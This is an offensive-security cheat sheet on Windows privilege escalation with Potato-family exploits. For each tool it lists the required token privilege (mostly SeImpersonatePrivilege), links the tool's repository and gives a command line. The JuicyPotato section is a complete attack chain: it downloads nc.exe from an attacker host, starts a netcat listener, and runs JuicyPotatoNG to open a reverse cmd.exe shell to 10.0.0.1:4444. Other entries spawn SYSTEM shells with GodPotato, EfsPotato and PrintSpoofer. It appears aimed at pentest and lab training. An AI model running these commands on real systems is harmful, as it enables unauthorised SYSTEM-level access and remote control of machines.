Windows PrivEsc with LocalPotato

- [Potatoes_Windows_Privesc](https://jlajara.gitlab.io/Potatoes_Windows_Privesc)
- [decoder-it](https://github.com/decoder-it/LocalPotato)
- [localpotato](https://www.localpotato.com/localpotato_html/LocalPotato.html)
- [tryhackme.com](https://tryhackme.com/room/localpotato)
- [roguepotato-and-printspoofer](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer)
- [foxglovesecurity.com](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/)

EfsPotato

Required Privilege

• SeImpersonatePrivilege

Payloads

• https://github.com/zcgonvh/EfsPotato

EfsPotato "cmd.exe /c whoami"

GodPotato

Required Privileges

• SeImpersonatePrivilege

Payloads

• https://github.com/BeichenDream/GodPotato

GodPotato -cmd "cmd /c whoami"

JuicyPotato

Required Privilege

• SeImpersonatePrivilege or SeAssignPrimaryToken

Payloads

• https://github.com/antonioCoco/JuicyPotatoNG
• https://github.com/ohpe/juicy-potato

Before exploiting, we need to upload nc.exe (it is available from here) to the target machine.

Invoke-WebRequest -Uri http://10.0.0.1:8000/nc.exe -OutFile c:\Temp\nc.exe

Next start a listener in local machine.

nc -lvnp 4444

Then execute JuicyPotato in target machine.

JuicyPotatoNG.exe -t * -p "c:\Temp\nc.exe" -a "10.0.0.1 4444 -e cmd.exe"

PrintSpoofer

Required Privilege

• SeImpersonatePrivilege

Payloads

• https://github.com/dievus/printspoofer

PrintSpoofer.exe -i -c cmd

RoguePotato

Required Privilege

• SeImpersonatePrivilege

Payloads

• https://github.com/antonioCoco/RoguePotato

RottenPotato

Required Privilege

• SeImpersonatePrivilege

Payloads

• https://github.com/breenmachine/RottenPotatoNG